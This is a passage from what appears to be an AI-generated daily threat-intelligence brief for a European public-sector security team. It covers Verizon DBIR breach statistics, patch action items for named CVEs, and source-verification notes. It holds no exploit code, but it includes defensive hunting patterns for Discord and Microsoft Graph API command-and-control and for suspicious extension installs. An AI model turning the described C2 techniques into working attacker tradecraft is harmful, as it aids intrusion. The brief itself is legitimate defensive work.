blip — the trend curve has been climbing for three reporting cycles and accelerated sharply in the 2024-2025 window. For SOCs, the implication is that detection-investment prioritisation that ranks credential-stuffing telemetry above EDR exploit-protection coverage and network-layer anomaly detection for exploitation activity is now out of alignment with the breach distribution. **Patching-cadence regression.** Only **26 % of CVEs listed in the CISA Known Exploited Vulnerabilities (KEV) catalog were fully remediated** by polled organisations in the reporting window, down from 38 % the prior year. The median time to patch deteriorated from 32 days to 43 days. Per PD-13 the KEV remediation deadline itself has no jurisdictional weight in CH/EU, but the *listing flag* is jurisdiction-agnostic intelligence about exploitation in the wild — and the DBIR's finding is that even organisations that are subject to BOD 22-01 are missing the deadline three quarters of the time. The benchmark for CH/EU public-sector defenders is therefore an honest one: most peers are not patching their KEV inventory on time, and median 43-day exposure is the operational reality. A SOC that is hitting 14-day patch SLAs on KEV entries is now outperforming the industry baseline by a factor of three. **Supply-chain breaches as the dominant compounding factor.** Third-party / supply-chain breaches grew 60 % year-over-year and now represent **48 % of all breaches** in the dataset (`T1195` Supply Chain Compromise). Only 23 % of affected organisations had fully remediated MFA gaps in third-party cloud accounts — the most common upstream pivot point. The 60 % growth aligns with the campaign-level signal this brief has carried throughout May 2026 (TeamPCP / Mini Shai-Hulud — see § 4 UPDATE; Nx Console / actions-cool-issues-helper / TanStack / durabletask). The actionable layer for defenders is third-party-CI access scoping — every reduction in the cross-tenant blast radius of a single compromised dev-tool integration directly reduces measured breach probability. **Ransomware and AI signals.** Ransomware was present in **48 % of breaches**, up from 44 % — the proportion-not-paying held at 69 %. The DBIR carries shadow AI usage as the third-most-common insider data-loss mechanism, with usage rates quadrupling year-over-year; the report also notes AI-bot traffic growing 21 % month-over-month against 0.3 % growth for human traffic. Verizon's press-release framing is that "AI is being leveraged by threat actors to accelerate the time to exploit known vulnerabilities, shrinking the window for defense from months to mere hours" ([GlobeNewswire](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html)) — that finding maps to the patch-velocity number: the 43-day median patch time that was acceptable when working PoCs took weeks is now insufficient when AI-assisted exploitation collapses weaponisation latency to hours. The full DBIR PDF is published at `verizon.com/business/resources/T1f0/reports/2026-dbir-data-breach-investigations-report.pdf`. **Defender takeaways for a Swiss / European public-sector SOC:** - Re-weight detection-investment priorities: EDR exploit-protection coverage and network-layer anomaly detection for `T1190` exploitation activity now rank above credential-stuffing detection for breach-probability reduction. - Use the 26 % KEV remediation rate and 43-day median patch time as the public benchmark when justifying patch-cadence SLAs to programme owners; the industry's distribution is far worse than most ISMS targets assume. - Treat third-party cloud-tenancy MFA gap closure as a single highest-leverage control — the 23 % remediation rate is the most actionable bar to clear. - Map the +60 % supply-chain finding directly onto NIS2 Article 21(2)(d) supply-chain-security obligations during the next ISMS review cycle; the DBIR is now the canonical industry-baseline citation. — *Source: [Verizon official press release (GlobeNewswire)](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html) · Additional source: [Help Net Security analysis](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/) · Additional source: [Verizon DBIR landing page](https://www.verizon.com/business/resources/reports/dbir/) · Tags: vulnerabilities, ransomware, supply-chain, ai-abuse, identity · Region: global · Sector: public-sector, finance, healthcare, technology* ## 6. Action Items - **Patch Drupal core on PostgreSQL backends immediately** — upgrade to 10.4.10 / 10.5.10 / 10.6.9 / 11.1.10 / 11.2.12 / 11.3.10. The Drupal Security Team warned that exploits "might be developed within hours or days" of the SA-CORE-2026-004 advisory (see § 4 UPDATE). If patch deployment is gated by change-control, temporarily front the site with Drupal Steward or an equivalent WAF rule covering SQL-injection vectors at the DB-API layer. — *Source: [Drupal SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) · Tags: vulnerabilities, pre-auth, patch-available · Region: global, europe · Sector: public-sector, education* - **Upgrade Keycloak to 26.6.2** with priority on identity-federation deployments (national digital-identity platforms, eHealth federations). The OIDC session-fixation (CVE-2026-7507), WebAuthn execute-actions replay (CVE-2026-37982) and cross-realm IDOR in Authorization Services (CVE-2026-4630) are the operationally-most-dangerous CVEs in the batch (see § 2). For Red Hat build of Keycloak, apply the corresponding RHSA advisories on the 26.2.x branch. — *Source: [Keycloak 26.6.2 release notes](https://www.keycloak.org/2026/05/keycloak-2662-released) · Tags: vulnerabilities, identity, patch-available · Region: europe, dach · Sector: public-sector, healthcare* - **Upgrade Azure Local Disconnected Operations (ALDO) to v2604+** on every air-gapped / data-sovereignty Azure Local deployment. The CVE-2026-42822 unauth EoP is rated CVSS 10.0 and "Exploitation More Likely" — cloud-managed Azure is already protected, manual stacks are not (see § 2). Restrict the ALDO management plane to admin-only OOB subnets until the upgrade is complete. — *Source: [Microsoft MSRC CVE-2026-42822](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822) · Tags: vulnerabilities, cloud, auth-bypass, patch-available · Region: global · Sector: public-sector, defense* - **Complete the six-step SonicWall LDAP reconfiguration on every Gen6 SSL-VPN appliance** per SonicWall KB `kA1VN0000000RBd0AM` — firmware-update status alone is insufficient and Akira-linked actors are actively exploiting the UPN/SAM split (see § 1). Given Gen6 EoL on 2026-04-16, schedule migration to Gen7/Gen8. — *Source: [Cybersecurity Dive](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/) · Tags: vulnerabilities, identity, actively-exploited, mitigation-only · Region: europe, global · Sector: public-sector, finance* - **Disable the ChromaDB Python FastAPI server or block external access** — CVE-2026-45829 has a public PoC, v1.5.9 is unpatched, and the Python server is the affected component (the Rust server is not). Migrate to the Rust server (`chroma run`) or front the API with network-layer access controls; ensure no ChromaDB deployment is internet-exposed (see § 2). — *Source: [Hadrian Security](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are) · Tags: vulnerabilities, rce, pre-auth, no-patch, ai-abuse · Region: global · Sector: technology, education* - **Hunt for Webworm Discord and Microsoft Graph API C2** — alert on outbound HTTPS to `discord.com/api/*` or `graph.microsoft.com` from process trees whose parent is not the expected first-party application; correlate Graph API non-interactive sign-ins for app registrations without enterprise approval, and flag `cmd.exe` spawned by long-running services with no interactive user context (see § 1). Apply Conditional Access on Microsoft Graph restricting non-managed device sign-ins on workstations that have no Graph integration need. — *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/) · Tags: nation-state, espionage, identity, china-nexus · Region: europe · Sector: public-sector* - **Audit VS Code extension installation policies on every developer endpoint** — enforce a managed allowlist via Group Policy / MDM, set `extensions.autoUpdate: false`, and rotate every secret accessible to extensions whenever a supply-chain compromise is confirmed (see § 4 UPDATE TeamPCP / GitHub breach). Hunt Sysmon EID 1 for `code --install-extension` invocations on dev endpoints; search CI/CD pipeline logs for `durabletask` package imports in versions 1.4.1–1.4.3 and treat any host that imported a malicious version as fully compromised. — *Source: [Help Net Security](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/) · Tags: supply-chain, organized-crime · Region: global · Sector: technology, public-sector* ## 7. Verification Notes - **Out-of-window drops (primary source older than 36h window):** **Exim CVE-2026-45185 "Dead.Letter"** — XBOW disclosure 2026-05-12, NCSC-NL advisory 2026-05-15; S2 surfaced an exploitation-confirmation quote from NCSC-NL but its publication date is ambiguous, so the item is held to the next run with the underlying advisory carried forward; **Fortinet CVE-2026-44277 (FortiAuthenticator) / CVE-2026-26083 (FortiSandbox)** — Fortinet PSIRT FG-IR-26-128 dated 2026-05-12, NCSC-CH advisory 2026-05-13, both outside the 36 h window; **SAP May 2026 Security Patch Day (CVE-2026-34260, CVE-2026-34263)** — SAP Security Notes dated 2026-05-12, outside window; **CrowdStrike 2026 Financial Services Threat Landscape Report** — both cited URLs carry publication date 2026-05-14 (not 2026-05-20 as the sub-agent return initially asserted), which puts the report 6 days outside the 36 h window. Item dropped from § 3 by iteration-1 verification (consistent with the SAP / Fortinet treatment in this same list); finance-sector audience may pick up the synthesis directly from the [CrowdStrike press release](https://www.crowdstrike.com/en-us/press-releases/crowdstrike-2026-financial-services-threat-landscape-report/) or [CrowdStrike blog](https://www.crowdstrike.com/en-us/blog/crowdstrike-2026-financial-services-threat-landscape-report/). - **Already-covered drops:** **Microsoft Fox Tempest malware-signing-as-a-service disruption** — covered in 2026-05-20 active-threats; S3 re-surfaced the Microsoft Threat Intelligence and Microsoft On the Issues posts with no material new development beyond yesterday's coverage. **Huawei VRP zero-day → Luxembourg POST 2025 nationwide outage** — covered in 2026-05-20 active-threats with the same The Record + Security Affairs sources S4 re-surfaced; no new technical specificity or CVE assignment in this run. - **Long-running-campaign rule application:** **Microsoft Exchange CVE-2026-42897** — re-surfaced by S2 with the same Microsoft MSRC + Microsoft Exchange Team + NCSC-CH + Help Net Security sources cited in the 2026-05-16 deep dive and the 2026-05-18 UPDATE. No new exploitation attribution, no new patch, no new victim class — per the long-running-campaign rule (≤1 consolidated UPDATE per week unless something critical changes) the item is not re-issued. Per PD-13 the imminent CISA KEV remediation deadline (2026-05-29, US-FCEB-only) is not a valid driver for a § 4 UPDATE. - **Reduced-confidence / framing:** **B1ack's Stash 4.6M card dump** included as a dark-web claim with explicit "not confirmed by issuing institutions" framing; SOCRadar and Security Affairs both analyse the actual dump, but per-issuer attribution is unverified. **Huawei VRP / Luxembourg** (not in this brief, but referenced in the dropped-list) — confidence remains MEDIUM in the sub-agent finding due to absence of any Huawei PSIRT advisory after ~10 months, no CVE assigned and no technical advisory specificity. - **Contradiction:** Grafana TanStack timeline — Grafana's own post-mortem ([Grafana Labs, 2026-05-19](https://grafana.com/blog/grafana-labs-security-update-latest-on-tanstack-npm-supply-chain-ransomware-incident/)) cites detection of the TanStack compromise on **2026-05-11**; BleepingComputer's reporting ([BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/security/grafana-breach-caused-by-missed-token-rotation-after-tanstack-attack/)) cites **2026-05-01** for the malicious-package consumption event. The brief reports Grafana's date on the basis that Grafana is the primary disclosing party for its own incident; the 10-day discrepancy may reflect the difference between the malicious-package's pull-time on the CI/CD runner and the detection event on Grafana's security team's timeline. - **Single-source items:** none in this brief — every published item carries ≥2 independent reputable sources or qualifies under the PD-5 national-CERT carve-out with the CERT acting as primary disclosing party. - **CVEs that did not clear § 2 inclusion gates** (PD-2 § 2 gates: CISA KEV, ENISA EUVD `exploited=true` or CVSS≥9.0, vendor/researcher report of ITW exploitation, or pre-auth RCE on widely-deployed internet-exposed software with public PoC): none dropped from in-window candidates in this run; out-of-window CVEs listed above were not evaluated against gates. - **Sub-agent self-identification:** all four `cti-research` sub-agents (S1, S2, S3, S4) returned with `**Model:**` and `**Timestamps:**` lines; the AI-content notice and `Generated by:` line collapse to the single distinct model Claude Sonnet 4.6 since all four research roles reported that model. - **Verification disposition (Phase 5.7):** five iterations ran with model rotation per v2.47 (iter-1 Opus, iter-2 Sonnet alt, iter-3 Opus cold, iter-4 Sonnet alt, iter-5 Opus cold); cumulative findings across iterations remediated in-line. Iter-5 returned NEEDS_FIXES with truth=1 (the unsupported "approximately 20 % the previous year" prior-year DBIR baseline in § 5 Headline shift paragraph) and one advisory (Grafana scope wording precision drift) — both remediated post-verdict before commit. The brief publishes at the v2.46 5-cap safety valve with `verification_residual_count=1` recording the final-iteration verdict as the cap-breach signal for the Ops dashboard. The notable verification finding-cluster of this run was iter-3's surfacing of multiple sub-agent attribution-discipline regressions in the § 4 TeamPCP UPDATE (five FIRESCALE / 417k / SSM specifics misattributed to Wiz), all remediated by aligning the body to Wiz's actual published technical detail. - **Coverage gaps:** databreaches-net (Cloudflare 403, Wayback empty — now 5 consecutive run failures); inside-it-ch (403 persistent — 4-run failure); sophos-xops (HTTP 503 persistent — 4-run failure); trendmicro-research (HTTP 500 persistent, no Wayback snapshot); cyberscoop (TLS certificate not-yet-valid error); darkreading (HTTP 403, no Wayback); cert-fr-actu (feed stale since October 2025); us-treasury-ofac (503); cert-eu (200 empty-body — 2-run failure); edpb, cnil-fr, ico-uk, agid-csirt-it — quiet in window (no in-window enforcement items); ncsc-ch-security-hub bridge subcommand and chrome-releases and jpcert not fetched in this run.